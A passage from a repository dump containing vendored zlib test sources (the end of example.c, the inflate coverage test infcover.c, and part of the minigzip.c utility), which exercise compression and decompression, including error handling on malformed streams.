exit(1); } else if (strcmp(zlibVersion(), ZLIB_VERSION) != 0) { fprintf(stderr, "warning: different zlib version linked: %s\n", zlibVersion()); } printf("zlib version %s = 0x%04x, compile flags = 0x%lx\n", ZLIB_VERSION, ZLIB_VERNUM, zlibCompileFlags()); compr = (Byte*)calloc((uInt)comprLen, 1); uncompr = (Byte*)calloc((uInt)uncomprLen, 1); /* compr and uncompr are cleared to avoid reading uninitialized * data and to ensure that uncompr compresses well. */ if (compr == Z_NULL || uncompr == Z_NULL) { printf("out of memory\n"); exit(1); } #ifdef Z_SOLO (void)argc; (void)argv; #else test_compress(compr, comprLen, uncompr, uncomprLen); test_gzio((argc > 1 ? argv[1] : TESTFILE), uncompr, uncomprLen); #endif test_deflate(compr, comprLen); test_inflate(compr, comprLen, uncompr, uncomprLen); test_large_deflate(compr, comprLen, uncompr, uncomprLen); test_large_inflate(compr, comprLen, uncompr, uncomprLen); test_flush(compr, &comprLen); test_sync(compr, comprLen, uncompr, uncomprLen); comprLen = 3 * uncomprLen; test_dict_deflate(compr, comprLen); test_dict_inflate(compr, comprLen, uncompr, uncomprLen); free(compr); free(uncompr); return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/test/infcover.c ================================================ /* infcover.c -- test zlib's inflate routines with full code coverage * Copyright (C) 2011, 2016 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* to use, do: ./configure --cover && make cover */ #include #include #include #include #include "zlib.h" /* get definition of internal structure so we can mess with it (see pull()), and so we can call inflate_trees() (see cover5()) */ #define ZLIB_INTERNAL #include "inftrees.h" #include "inflate.h" #define local static /* -- memory tracking routines -- */ /* These memory tracking routines are provided to zlib and track all of zlib's allocations and deallocations, check for LIFO operations, keep a current and high water mark of total bytes requested, optionally set a limit on the total memory that can be allocated, and when done check for memory leaks. They are used as follows: z_stream strm; mem_setup(&strm) initializes the memory tracking and sets the zalloc, zfree, and opaque members of strm to use memory tracking for all zlib operations on strm mem_limit(&strm, limit) sets a limit on the total bytes requested -- a request that exceeds this limit will result in an allocation failure (returns NULL) -- setting the limit to zero means no limit, which is the default after mem_setup() mem_used(&strm, "msg") prints to stderr "msg" and the total bytes used mem_high(&strm, "msg") prints to stderr "msg" and the high water mark mem_done(&strm, "msg") ends memory tracking, releases all allocations for the tracking as well as leaked zlib blocks, if any. If there was anything unusual, such as leaked blocks, non-FIFO frees, or frees of addresses not allocated, then "msg" and information about the problem is printed to stderr. If everything is normal, nothing is printed. mem_done resets the strm members to Z_NULL to use the default memory allocation routines on the next zlib initialization using strm. */ /* these items are strung together in a linked list, one for each allocation */ struct mem_item { void *ptr; /* pointer to allocated memory */ size_t size; /* requested size of allocation */ struct mem_item *next; /* pointer to next item in list, or NULL */ }; /* this structure is at the root of the linked list, and tracks statistics */ struct mem_zone { struct mem_item *first; /* pointer to first item in list, or NULL */ size_t total, highwater; /* total allocations, and largest total */ size_t limit; /* memory allocation limit, or 0 if no limit */ int notlifo, rogue; /* counts of non-LIFO frees and rogue frees */ }; /* memory allocation routine to pass to zlib */ local void *mem_alloc(void *mem, unsigned count, unsigned size) { void *ptr; struct mem_item *item; struct mem_zone *zone = mem; size_t len = count * (size_t)size; /* induced allocation failure */ if (zone == NULL || (zone->limit && zone->total + len > zone->limit)) return NULL; /* perform allocation using the standard library, fill memory with a non-zero value to make sure that the code isn't depending on zeros */ ptr = malloc(len); if (ptr == NULL) return NULL; memset(ptr, 0xa5, len); /* create a new item for the list */ item = malloc(sizeof(struct mem_item)); if (item == NULL) { free(ptr); return NULL; } item->ptr = ptr; item->size = len; /* insert item at the beginning of the list */ item->next = zone->first; zone->first = item; /* update the statistics */ zone->total += item->size; if (zone->total > zone->highwater) zone->highwater = zone->total; /* return the allocated memory */ return ptr; } /* memory free routine to pass to zlib */ local void mem_free(void *mem, void *ptr) { struct mem_item *item, *next; struct mem_zone *zone = mem; /* if no zone, just do a free */ if (zone == NULL) { free(ptr); return; } /* point next to the item that matches ptr, or NULL if not found -- remove the item from the linked list if found */ next = zone->first; if (next) { if (next->ptr == ptr) zone->first = next->next; /* first one is it, remove from list */ else { do { /* search the linked list */ item = next; next = item->next; } while (next != NULL && next->ptr != ptr); if (next) { /* if found, remove from linked list */ item->next = next->next; zone->notlifo++; /* not a LIFO free */ } } } /* if found, update the statistics and free the item */ if (next) { zone->total -= next->size; free(next); } /* if not found, update the rogue count */ else zone->rogue++; /* in any case, do the requested free with the standard library function */ free(ptr); } /* set up a controlled memory allocation space for monitoring, set the stream parameters to the controlled routines, with opaque pointing to the space */ local void mem_setup(z_stream *strm) { struct mem_zone *zone; zone = malloc(sizeof(struct mem_zone)); assert(zone != NULL); zone->first = NULL; zone->total = 0; zone->highwater = 0; zone->limit = 0; zone->notlifo = 0; zone->rogue = 0; strm->opaque = zone; strm->zalloc = mem_alloc; strm->zfree = mem_free; } /* set a limit on the total memory allocation, or 0 to remove the limit */ local void mem_limit(z_stream *strm, size_t limit) { struct mem_zone *zone = strm->opaque; zone->limit = limit; } /* show the current total requested allocations in bytes */ local void mem_used(z_stream *strm, char *prefix) { struct mem_zone *zone = strm->opaque; fprintf(stderr, "%s: %lu allocated\n", prefix, zone->total); } /* show the high water allocation in bytes */ local void mem_high(z_stream *strm, char *prefix) { struct mem_zone *zone = strm->opaque; fprintf(stderr, "%s: %lu high water mark\n", prefix, zone->highwater); } /* release the memory allocation zone -- if there are any surprises, notify */ local void mem_done(z_stream *strm, char *prefix) { int count = 0; struct mem_item *item, *next; struct mem_zone *zone = strm->opaque; /* show high water mark */ mem_high(strm, prefix); /* free leftover allocations and item structures, if any */ item = zone->first; while (item != NULL) { free(item->ptr); next = item->next; free(item); item = next; count++; } /* issue alerts about anything unexpected */ if (count || zone->total) fprintf(stderr, "** %s: %lu bytes in %d blocks not freed\n", prefix, zone->total, count); if (zone->notlifo) fprintf(stderr, "** %s: %d frees not LIFO\n", prefix, zone->notlifo); if (zone->rogue) fprintf(stderr, "** %s: %d frees not recognized\n", prefix, zone->rogue); /* free the zone and delete from the stream */ free(zone); strm->opaque = Z_NULL; strm->zalloc = Z_NULL; strm->zfree = Z_NULL; } /* -- inflate test routines -- */ /* Decode a hexadecimal string, set *len to length, in[] to the bytes. This decodes liberally, in that hex digits can be adjacent, in which case two in a row writes a byte. Or they can be delimited by any non-hex character, where the delimiters are ignored except when a single hex digit is followed by a delimiter, where that single digit writes a byte. The returned data is allocated and must eventually be freed. NULL is returned if out of memory. If the length is not needed, then len can be NULL. */ local unsigned char *h2b(const char *hex, unsigned *len) { unsigned char *in, *re; unsigned next, val; in = malloc((strlen(hex) + 1) >> 1); if (in == NULL) return NULL; next = 0; val = 1; do { if (*hex >= '0' && *hex <= '9') val = (val << 4) + *hex - '0'; else if (*hex >= 'A' && *hex <= 'F') val = (val << 4) + *hex - 'A' + 10; else if (*hex >= 'a' && *hex <= 'f') val = (val << 4) + *hex - 'a' + 10; else if (val != 1 && val < 32) /* one digit followed by delimiter */ val += 240; /* make it look like two digits */ if (val > 255) { /* have two digits */ in[next++] = val & 0xff; /* save the decoded byte */ val = 1; /* start over */ } } while (*hex++); /* go through the loop with the terminating null */ if (len != NULL) *len = next; re = realloc(in, next); return re == NULL ? in : re; } /* generic inflate() run, where hex is the hexadecimal input data, what is the text to include in an error message, step is how much input data to feed inflate() on each call, or zero to feed it all, win is the window bits parameter to inflateInit2(), len is the size of the output buffer, and err is the error code expected from the first inflate() call (the second inflate() call is expected to return Z_STREAM_END). If win is 47, then header information is collected with inflateGetHeader(). If a zlib stream is looking for a dictionary, then an empty dictionary is provided. inflate() is run until all of the input data is consumed. */ local void inf(char *hex, char *what, unsigned step, int win, unsigned len, int err) { int ret; unsigned have; unsigned char *in, *out; z_stream strm, copy; gz_header head; mem_setup(&strm); strm.avail_in = 0; strm.next_in = Z_NULL; ret = inflateInit2(&strm, win); if (ret != Z_OK) { mem_done(&strm, what); return; } out = malloc(len); assert(out != NULL); if (win == 47) { head.extra = out; head.extra_max = len; head.name = out; head.name_max = len; head.comment = out; head.comm_max = len; ret = inflateGetHeader(&strm, &head); assert(ret == Z_OK); } in = h2b(hex, &have); assert(in != NULL); if (step == 0 || step > have) step = have; strm.avail_in = step; have -= step; strm.next_in = in; do { strm.avail_out = len; strm.next_out = out; ret = inflate(&strm, Z_NO_FLUSH); assert(err == 9 || ret == err); if (ret != Z_OK && ret != Z_BUF_ERROR && ret != Z_NEED_DICT) break; if (ret == Z_NEED_DICT) { ret = inflateSetDictionary(&strm, in, 1); assert(ret == Z_DATA_ERROR); mem_limit(&strm, 1); ret = inflateSetDictionary(&strm, out, 0); assert(ret == Z_MEM_ERROR); mem_limit(&strm, 0); ((struct inflate_state *)strm.state)->mode = DICT; ret = inflateSetDictionary(&strm, out, 0); assert(ret == Z_OK); ret = inflate(&strm, Z_NO_FLUSH); assert(ret == Z_BUF_ERROR); } ret = inflateCopy(©, &strm); assert(ret == Z_OK); ret = inflateEnd(©); assert(ret == Z_OK); err = 9; /* don't care next time around */ have += strm.avail_in; strm.avail_in = step > have ? have : step; have -= strm.avail_in; } while (strm.avail_in); free(in); free(out); ret = inflateReset2(&strm, -8); assert(ret == Z_OK); ret = inflateEnd(&strm); assert(ret == Z_OK); mem_done(&strm, what); } /* cover all of the lines in inflate.c up to inflate() */ local void cover_support(void) { int ret; z_stream strm; mem_setup(&strm); strm.avail_in = 0; strm.next_in = Z_NULL; ret = inflateInit(&strm); assert(ret == Z_OK); mem_used(&strm, "inflate init"); ret = inflatePrime(&strm, 5, 31); assert(ret == Z_OK); ret = inflatePrime(&strm, -1, 0); assert(ret == Z_OK); ret = inflateSetDictionary(&strm, Z_NULL, 0); assert(ret == Z_STREAM_ERROR); ret = inflateEnd(&strm); assert(ret == Z_OK); mem_done(&strm, "prime"); inf("63 0", "force window allocation", 0, -15, 1, Z_OK); inf("63 18 5", "force window replacement", 0, -8, 259, Z_OK); inf("63 18 68 30 d0 0 0", "force split window update", 4, -8, 259, Z_OK); inf("3 0", "use fixed blocks", 0, -15, 1, Z_STREAM_END); inf("", "bad window size", 0, 1, 0, Z_STREAM_ERROR); mem_setup(&strm); strm.avail_in = 0; strm.next_in = Z_NULL; ret = inflateInit_(&strm, "!", (int)sizeof(z_stream)); assert(ret == Z_VERSION_ERROR); mem_done(&strm, "wrong version"); strm.avail_in = 0; strm.next_in = Z_NULL; ret = inflateInit(&strm); assert(ret == Z_OK); ret = inflateEnd(&strm); assert(ret == Z_OK); fputs("inflate built-in memory routines\n", stderr); } /* cover all inflate() header and trailer cases and code after inflate() */ local void cover_wrap(void) { int ret; z_stream strm, copy; unsigned char dict[257]; ret = inflate(Z_NULL, 0); assert(ret == Z_STREAM_ERROR); ret = inflateEnd(Z_NULL); assert(ret == Z_STREAM_ERROR); ret = inflateCopy(Z_NULL, Z_NULL); assert(ret == Z_STREAM_ERROR); fputs("inflate bad parameters\n", stderr); inf("1f 8b 0 0", "bad gzip method", 0, 31, 0, Z_DATA_ERROR); inf("1f 8b 8 80", "bad gzip flags", 0, 31, 0, Z_DATA_ERROR); inf("77 85", "bad zlib method", 0, 15, 0, Z_DATA_ERROR); inf("8 99", "set window size from header", 0, 0, 0, Z_OK); inf("78 9c", "bad zlib window size", 0, 8, 0, Z_DATA_ERROR); inf("78 9c 63 0 0 0 1 0 1", "check adler32", 0, 15, 1, Z_STREAM_END); inf("1f 8b 8 1e 0 0 0 0 0 0 1 0 0 0 0 0 0", "bad header crc", 0, 47, 1, Z_DATA_ERROR); inf("1f 8b 8 2 0 0 0 0 0 0 1d 26 3 0 0 0 0 0 0 0 0 0", "check gzip length", 0, 47, 0, Z_STREAM_END); inf("78 90", "bad zlib header check", 0, 47, 0, Z_DATA_ERROR); inf("8 b8 0 0 0 1", "need dictionary", 0, 8, 0, Z_NEED_DICT); inf("78 9c 63 0", "compute adler32", 0, 15, 1, Z_OK); mem_setup(&strm); strm.avail_in = 0; strm.next_in = Z_NULL; ret = inflateInit2(&strm, -8); strm.avail_in = 2; strm.next_in = (void *)"\x63"; strm.avail_out = 1; strm.next_out = (void *)&ret; mem_limit(&strm, 1); ret = inflate(&strm, Z_NO_FLUSH); assert(ret == Z_MEM_ERROR); ret = inflate(&strm, Z_NO_FLUSH); assert(ret == Z_MEM_ERROR); mem_limit(&strm, 0); memset(dict, 0, 257); ret = inflateSetDictionary(&strm, dict, 257); assert(ret == Z_OK); mem_limit(&strm, (sizeof(struct inflate_state) << 1) + 256); ret = inflatePrime(&strm, 16, 0); assert(ret == Z_OK); strm.avail_in = 2; strm.next_in = (void *)"\x80"; ret = inflateSync(&strm); assert(ret == Z_DATA_ERROR); ret = inflate(&strm, Z_NO_FLUSH); assert(ret == Z_STREAM_ERROR); strm.avail_in = 4; strm.next_in = (void *)"\0\0\xff\xff"; ret = inflateSync(&strm); assert(ret == Z_OK); (void)inflateSyncPoint(&strm); ret = inflateCopy(©, &strm); assert(ret == Z_MEM_ERROR); mem_limit(&strm, 0); ret = inflateUndermine(&strm, 1); assert(ret == Z_DATA_ERROR); (void)inflateMark(&strm); ret = inflateEnd(&strm); assert(ret == Z_OK); mem_done(&strm, "miscellaneous, force memory errors"); } /* input and output functions for inflateBack() */ local unsigned pull(void *desc, unsigned char **buf) { static unsigned int next = 0; static unsigned char dat[] = {0x63, 0, 2, 0}; struct inflate_state *state; if (desc == Z_NULL) { next = 0; return 0; /* no input (already provided at next_in) */ } state = (void *)((z_stream *)desc)->state; if (state != Z_NULL) state->mode = SYNC; /* force an otherwise impossible situation */ return next < sizeof(dat) ? (*buf = dat + next++, 1) : 0; } local int push(void *desc, unsigned char *buf, unsigned len) { (void)buf; (void)len; return desc != Z_NULL; /* force error if desc not null */ } /* cover inflateBack() up to common deflate data cases and after those */ local void cover_back(void) { int ret; z_stream strm; unsigned char win[32768]; ret = inflateBackInit_(Z_NULL, 0, win, 0, 0); assert(ret == Z_VERSION_ERROR); ret = inflateBackInit(Z_NULL, 0, win); assert(ret == Z_STREAM_ERROR); ret = inflateBack(Z_NULL, Z_NULL, Z_NULL, Z_NULL, Z_NULL); assert(ret == Z_STREAM_ERROR); ret = inflateBackEnd(Z_NULL); assert(ret == Z_STREAM_ERROR); fputs("inflateBack bad parameters\n", stderr); mem_setup(&strm); ret = inflateBackInit(&strm, 15, win); assert(ret == Z_OK); strm.avail_in = 2; strm.next_in = (void *)"\x03"; ret = inflateBack(&strm, pull, Z_NULL, push, Z_NULL); assert(ret == Z_STREAM_END); /* force output error */ strm.avail_in = 3; strm.next_in = (void *)"\x63\x00"; ret = inflateBack(&strm, pull, Z_NULL, push, &strm); assert(ret == Z_BUF_ERROR); /* force mode error by mucking with state */ ret = inflateBack(&strm, pull, &strm, push, Z_NULL); assert(ret == Z_STREAM_ERROR); ret = inflateBackEnd(&strm); assert(ret == Z_OK); mem_done(&strm, "inflateBack bad state"); ret = inflateBackInit(&strm, 15, win); assert(ret == Z_OK); ret = inflateBackEnd(&strm); assert(ret == Z_OK); fputs("inflateBack built-in memory routines\n", stderr); } /* do a raw inflate of data in hexadecimal with both inflate and inflateBack */ local int try(char *hex, char *id, int err) { int ret; unsigned len, size; unsigned char *in, *out, *win; char *prefix; z_stream strm; /* convert to hex */ in = h2b(hex, &len); assert(in != NULL); /* allocate work areas */ size = len << 3; out = malloc(size); assert(out != NULL); win = malloc(32768); assert(win != NULL); prefix = malloc(strlen(id) + 6); assert(prefix != NULL); /* first with inflate */ strcpy(prefix, id); strcat(prefix, "-late"); mem_setup(&strm); strm.avail_in = 0; strm.next_in = Z_NULL; ret = inflateInit2(&strm, err < 0 ? 47 : -15); assert(ret == Z_OK); strm.avail_in = len; strm.next_in = in; do { strm.avail_out = size; strm.next_out = out; ret = inflate(&strm, Z_TREES); assert(ret != Z_STREAM_ERROR && ret != Z_MEM_ERROR); if (ret == Z_DATA_ERROR || ret == Z_NEED_DICT) break; } while (strm.avail_in || strm.avail_out == 0); if (err) { assert(ret == Z_DATA_ERROR); assert(strcmp(id, strm.msg) == 0); } inflateEnd(&strm); mem_done(&strm, prefix); /* then with inflateBack */ if (err >= 0) { strcpy(prefix, id); strcat(prefix, "-back"); mem_setup(&strm); ret = inflateBackInit(&strm, 15, win); assert(ret == Z_OK); strm.avail_in = len; strm.next_in = in; ret = inflateBack(&strm, pull, Z_NULL, push, Z_NULL); assert(ret != Z_STREAM_ERROR); if (err) { assert(ret == Z_DATA_ERROR); assert(strcmp(id, strm.msg) == 0); } inflateBackEnd(&strm); mem_done(&strm, prefix); } /* clean up */ free(prefix); free(win); free(out); free(in); return ret; } /* cover deflate data cases in both inflate() and inflateBack() */ local void cover_inflate(void) { try("0 0 0 0 0", "invalid stored block lengths", 1); try("3 0", "fixed", 0); try("6", "invalid block type", 1); try("1 1 0 fe ff 0", "stored", 0); try("fc 0 0", "too many length or distance symbols", 1); try("4 0 fe ff", "invalid code lengths set", 1); try("4 0 24 49 0", "invalid bit length repeat", 1); try("4 0 24 e9 ff ff", "invalid bit length repeat", 1); try("4 0 24 e9 ff 6d", "invalid code -- missing end-of-block", 1); try("4 80 49 92 24 49 92 24 71 ff ff 93 11 0", "invalid literal/lengths set", 1); try("4 80 49 92 24 49 92 24 f b4 ff ff c3 84", "invalid distances set", 1); try("4 c0 81 8 0 0 0 0 20 7f eb b 0 0", "invalid literal/length code", 1); try("2 7e ff ff", "invalid distance code", 1); try("c c0 81 0 0 0 0 0 90 ff 6b 4 0", "invalid distance too far back", 1); /* also trailer mismatch just in inflate() */ try("1f 8b 8 0 0 0 0 0 0 0 3 0 0 0 0 1", "incorrect data check", -1); try("1f 8b 8 0 0 0 0 0 0 0 3 0 0 0 0 0 0 0 0 1", "incorrect length check", -1); try("5 c0 21 d 0 0 0 80 b0 fe 6d 2f 91 6c", "pull 17", 0); try("5 e0 81 91 24 cb b2 2c 49 e2 f 2e 8b 9a 47 56 9f fb fe ec d2 ff 1f", "long code", 0); try("ed c0 1 1 0 0 0 40 20 ff 57 1b 42 2c 4f", "length extra", 0); try("ed cf c1 b1 2c 47 10 c4 30 fa 6f 35 1d 1 82 59 3d fb be 2e 2a fc f c", "long distance and extra", 0); try("ed c0 81 0 0 0 0 80 a0 fd a9 17 a9 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 " "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6", "window end", 0); inf("2 8 20 80 0 3 0", "inflate_fast TYPE return", 0, -15, 258, Z_STREAM_END); inf("63 18 5 40 c 0", "window wrap", 3, -8, 300, Z_OK); } /* cover remaining lines in inftrees.c */ local void cover_trees(void) { int ret; unsigned bits; unsigned short lens[16], work[16]; code *next, table[ENOUGH_DISTS]; /* we need to call inflate_table() directly in order to manifest not- enough errors, since zlib insures that enough is always enough */ for (bits = 0; bits < 15; bits++) lens[bits] = (unsigned short)(bits + 1); lens[15] = 15; next = table; bits = 15; ret = inflate_table(DISTS, lens, 16, &next, &bits, work); assert(ret == 1); next = table; bits = 1; ret = inflate_table(DISTS, lens, 16, &next, &bits, work); assert(ret == 1); fputs("inflate_table not enough errors\n", stderr); } /* cover remaining inffast.c decoding and window copying */ local void cover_fast(void) { inf("e5 e0 81 ad 6d cb b2 2c c9 01 1e 59 63 ae 7d ee fb 4d fd b5 35 41 68" " ff 7f 0f 0 0 0", "fast length extra bits", 0, -8, 258, Z_DATA_ERROR); inf("25 fd 81 b5 6d 59 b6 6a 49 ea af 35 6 34 eb 8c b9 f6 b9 1e ef 67 49" " 50 fe ff ff 3f 0 0", "fast distance extra bits", 0, -8, 258, Z_DATA_ERROR); inf("3 7e 0 0 0 0 0", "fast invalid distance code", 0, -8, 258, Z_DATA_ERROR); inf("1b 7 0 0 0 0 0", "fast invalid literal/length code", 0, -8, 258, Z_DATA_ERROR); inf("d c7 1 ae eb 38 c 4 41 a0 87 72 de df fb 1f b8 36 b1 38 5d ff ff 0", "fast 2nd level codes and too far back", 0, -8, 258, Z_DATA_ERROR); inf("63 18 5 8c 10 8 0 0 0 0", "very common case", 0, -8, 259, Z_OK); inf("63 60 60 18 c9 0 8 18 18 18 26 c0 28 0 29 0 0 0", "contiguous and wrap around window", 6, -8, 259, Z_OK); inf("63 0 3 0 0 0 0 0", "copy direct from output", 0, -8, 259, Z_STREAM_END); } int main(void) { fprintf(stderr, "%s\n", zlibVersion()); cover_support(); cover_wrap(); cover_back(); cover_inflate(); cover_trees(); cover_fast(); return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/test/minigzip.c ================================================ /* minigzip.c -- simulate gzip using the zlib compression library * Copyright (C) 1995-2006, 2010, 2011, 2016 Jean-loup Gailly * For conditions of distribution and use, see copyright notice in zlib.h */ /* * minigzip is a minimal implementation of the gzip utility. This is * only an example of using zlib and isn't meant to replace the * full-featured gzip. No attempt is made to deal with file systems * limiting names to 14 or 8+3 characters, etc... Error checking is * very limited. So use minigzip only for testing; use gzip for the * real thing. On MSDOS, use only on file names without extension * or in pipe mode. */ /* @(#) $Id$ */ #include "zlib.h" #include #ifdef STDC # include # include #endif #ifdef USE_MMAP # include # include # include #endif #if defined(MSDOS) || defined(OS2) || defined(WIN32) || defined(__CYGWIN__) # include # include # ifdef UNDER_CE # include # endif # define SET_BINARY_MODE(file) setmode(fileno(file), O_BINARY) #else # define SET_BINARY_MODE(file) #endif #if defined(_MSC_VER) && _MSC_VER < 1900 # define snprintf _snprintf #endif #ifdef VMS # define unlink delete # define GZ_SUFFIX "-gz" #endif #ifdef RISCOS # define unlink remove # define GZ_SUFFIX "-gz" # define fileno(file) file->__file #endif #if defined(__MWERKS__) && __dest_os != __be_os && __dest_os != __win32_os # include /* for fileno */ #endif #if !defined(Z_HAVE_UNISTD_H) && !defined(_LARGEFILE64_SOURCE) #ifndef WIN32 /* unlink already in stdio.h for WIN32 */ extern int unlink(const char *); #endif #endif #if defined(UNDER_CE) # include # define perror(s) pwinerror(s) /* Map the Windows error number in ERROR to a locale-dependent error message string and return a pointer to it. Typically, the values for ERROR come from GetLastError. The string pointed to shall not be modified by the application, but may be overwritten by a subsequent call to strwinerror The strwinerror function does not change the current setting of GetLastError. */ static char *strwinerror (error) DWORD error; { static char buf[1024]; wchar_t *msgbuf; DWORD lasterr = GetLastError(); DWORD chars = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER, NULL, error, 0, /* Default language */ (LPVOID)&msgbuf, 0, NULL); if (chars != 0) { /* If there is an \r\n appended, zap it. */ if (chars >= 2 && msgbuf[chars - 2] == '\r' && msgbuf[chars - 1] == '\n') { chars -= 2; msgbuf[chars] = 0; } if (chars > sizeof (buf) - 1) { chars = sizeof (buf) - 1; msgbuf[chars] = 0; } wcstombs(buf, msgbuf, chars + 1); LocalFree(msgbuf); } else { sprintf(buf, "unknown win32 error (%ld)", error); } SetLastError(lasterr); return buf; } static void pwinerror (s) const char *s; { if (s && *s) fprintf(stderr, "%s: %s\n", s, strwinerror(GetLastError ())); else fprintf(stderr, "%s\n", strwinerror(GetLastError ())); } #endif /* UNDER_CE */ #ifndef GZ_SUFFIX # define GZ_SUFFIX ".gz" #endif #define SUFFIX_LEN (sizeof(GZ_SUFFIX)-1) #define BUFLEN 16384 #define MAX_NAME_LEN 1024 #ifdef MAXSEG_64K # define local static /* Needed for systems with limitation on stack size. */ #else # define local #endif #ifdef Z_SOLO /* for Z_SOLO, create simplified gz* functions using deflate and inflate */ #if defined(Z_HAVE_UNISTD_H) || defined(Z_LARGE) # include /* for unlink() */ #endif void *myalloc(void *q, unsigned n, unsigned m) { (void)q; return calloc(n, m); } void myfree(void *q, void *p) { (void)q; free(p); } typedef struct gzFile_s { FILE *file; int write; int err; char *msg; z_stream strm; } *gzFile; gzFile gz_open(const char *path, int fd, const char *mode) { gzFile gz; int ret; gz = malloc(sizeof(struct gzFile_s)); if (gz == NULL) return NULL; gz->write = strchr(mode, 'w') != NULL; gz->strm.zalloc = myalloc; gz->strm.zfree = myfree; gz->strm.opaque = Z_NULL; if (gz->write) ret = deflateInit2(&(gz->strm), -1, 8, 15 + 16, 8, 0); else { gz->strm.next_in = 0; gz->strm.avail_in = Z_NULL; ret = inflateInit2(&(gz->strm), 15 + 16); } if (ret != Z_OK) { free(gz); return NULL; } gz->file = path == NULL ? fdopen(fd, gz->write ? "wb" : "rb") : fopen(path, gz->write ? "wb" : "rb"); if (gz->file == NULL) { gz->write ? deflateEnd(&(gz->strm)) : inflateEnd(&(gz->strm)); free(gz); return NULL; } gz->err = 0; gz->msg = ""; return gz; } gzFile gzopen(const char *path, const char *mode) { return gz_open(path, -1, mode); } gzFile gzdopen(int fd, const char *mode) { return gz_open(NULL, fd, mode); } int gzwrite(gzFile gz, const void *buf, unsigned len) { z_stream *strm; unsigned char out[BUFLEN]; if (gz == NULL || !gz->write) return 0; strm = &(gz->strm); strm->next_in = (void *)buf; strm->avail_in = len; do { strm->next_out = out; strm->avail_out = BUFLEN; (void)deflate(strm, Z_NO_FLUSH); fwrite(out, 1, BUFLEN - strm->avail_out, gz->file); } while (strm->avail_out == 0); return len; } int gzread(gzFile gz, void *buf, unsigned len) { int ret; unsigned got; unsigned char in[1]; z_stream *strm; if (gz == NULL || gz->write) return 0; if (gz->err) return 0; strm = &(gz->strm); strm->next_out = (void *)buf; strm->avail_out = len; do { got = fread(in, 1, 1, gz->file); if (got == 0) break; strm->next_in = in; strm->avail_in = 1; ret = inflate(strm, Z_NO_FLUSH); if (ret == Z_DATA_ERROR) { gz->err = Z_DATA_ERROR; gz->msg = strm->msg; return 0; } if (ret == Z_STREAM_END) inflateReset(strm); } while (strm->avail_out); return len - strm->avail_out; } int gzclose(gzFile gz) { z_stream *strm; unsigned char out[BUFLEN]; if (gz == NULL) return Z_STREAM_ERROR; strm = &(gz->strm); if (gz->write) { strm->next_in = Z_NULL; strm->avail_in = 0; do { strm->next_out = out; strm->avail_out = BUFLEN; (void)deflate(strm, Z_FINISH); fwrite(out, 1, BUFLEN - strm->avail_out, gz->file); } while (strm->avail_out == 0); deflateEnd(strm); } else inflateEnd(strm); fclose(gz->file); free(gz); return Z_OK; } const char *gzerror(gzFile gz, int *err) { *err = gz->err; return gz->msg; } #endif static char *prog; /* =========================================================================== * Display error message and exit */ void error(const char *msg) { fprintf(stderr, "%s: %s\n", prog, msg); exit(1); } #ifdef USE_MMAP /* MMAP version, Miguel Albrecht */ /* Try compressing the input file at once using mmap. Return Z_OK if * if success, Z_ERRNO otherwise. */ int gz_compress_mmap(FILE *in, gzFile out) { int len; int err; int ifd = fileno(in); caddr_t buf; /* mmap'ed buffer for the entire input file */ off_t buf_len; /* length of the input file */ struct stat sb; /* Determine the size of the file, needed for mmap: */ if (fstat(ifd, &sb) < 0) return Z_ERRNO; buf_len = sb.st_size; if (buf_len <= 0) return Z_ERRNO; /* Now do the actual mmap: */ buf = mmap((caddr_t) 0, buf_len, PROT_READ, MAP_SHARED, ifd, (off_t)0); if (buf == (caddr_t)(-1)) return Z_ERRNO; /* Compress the whole file at once: */ len = gzwrite(out, (char *)buf, (unsigned)buf_len); if (len != (int)buf_len) error(gzerror(out, &err)); munmap(buf, buf_len); fclose(in); if (gzclose(out) != Z_OK) error("failed gzclose"); return Z_OK; } #endif /* USE_MMAP */ /* =========================================================================== * Compress input to output then close both files. */ void gz_compress(FILE *in, gzFile out) { local char buf[BUFLEN]; int len; int err; #ifdef USE_MMAP /* Try first compressing with mmap. If mmap fails (minigzip used in a * pipe), use the normal fread loop. */ if (gz_compress_mmap(in, out) == Z_OK) return; #endif for (;;) { len = (int)fread(buf, 1, sizeof(buf), in); if (ferror(in)) { perror("fread"); exit(1); } if (len == 0) break; if (gzwrite(out, buf, (unsigned)len) != len) error(gzerror(out, &err)); } fclose(in); if (gzclose(out) != Z_OK) error("failed gzclose"); } /* =========================================================================== * Uncompress input to output then close both files. */ void gz_uncompress(gzFile in, FILE *out) { local char buf[BUFLEN]; int len; int err; for (;;) { len = gzread(in, buf, sizeof(buf)); if (len < 0) error (gzerror(in, &err)); if (len == 0) break; if ((int)fwrite(buf, 1, (unsigned)len, out) != len) { error("failed fwrite"); } } if (fclose(out)) error("failed fclose"); if (gzclose(in) != Z_OK) error("failed gzclose"); } /* =========================================================================== * Compress the given file: create a corresponding .gz file and remove the * original. */ void file_compress(char *file, char *mode) { local char outfile[MAX_NAME_LEN]; FILE *in; gzFile out; if (strlen(file) + strlen(GZ_SUFFIX) >= sizeof(outfile)) { fprintf(stderr, "%s: filename too long\n", prog); exit(1); } #if !defined(NO_snprintf) && !defined(NO_vsnprintf) snprintf(outfile, sizeof(outfile), "%s%s", file, GZ_SUFFIX); #else strcpy(outfile, file); strcat(outfile, GZ_SUFFIX); #endif in = fopen(file, "rb"); if (in == NULL) { perror(file); exit(1); } out = gzopen(outfile, mode); if (out == NULL) { fprintf(stderr, "%s: can't gzopen %s\n", prog, outfile); exit(1); } gz_compress(in, out); unlink(file); } /* =========================================================================== * Uncompress the given file and remove the original. */ void file_uncompress(char *file) { local char buf[MAX_NAME_LEN]; char *infile, *outfile; FILE *out; gzFile in; z_size_t len = strlen(file); if (len + strlen(GZ_SUFFIX) >= sizeof(buf)) { fprintf(stderr, "%s: filename too long\n", prog); exit(1); } #if !defined(NO_snprintf) && !defined(NO_vsnprintf) snprintf(buf, sizeof(buf), "%s", file); #else strcpy(buf, file); #endif if (len > SUFFIX_LEN && strcmp(file+len-SUFFIX_LEN, GZ_SUFFIX) == 0) { infile = file; outfile = buf; outfile[len-3] = '\0'; } else { outfile = file; infile = buf; #if !defined(NO_snprintf) && !defined(NO_vsnprintf) snprintf(buf + len, sizeof(buf) - len, "%s", GZ_SUFFIX); #else strcat(infile, 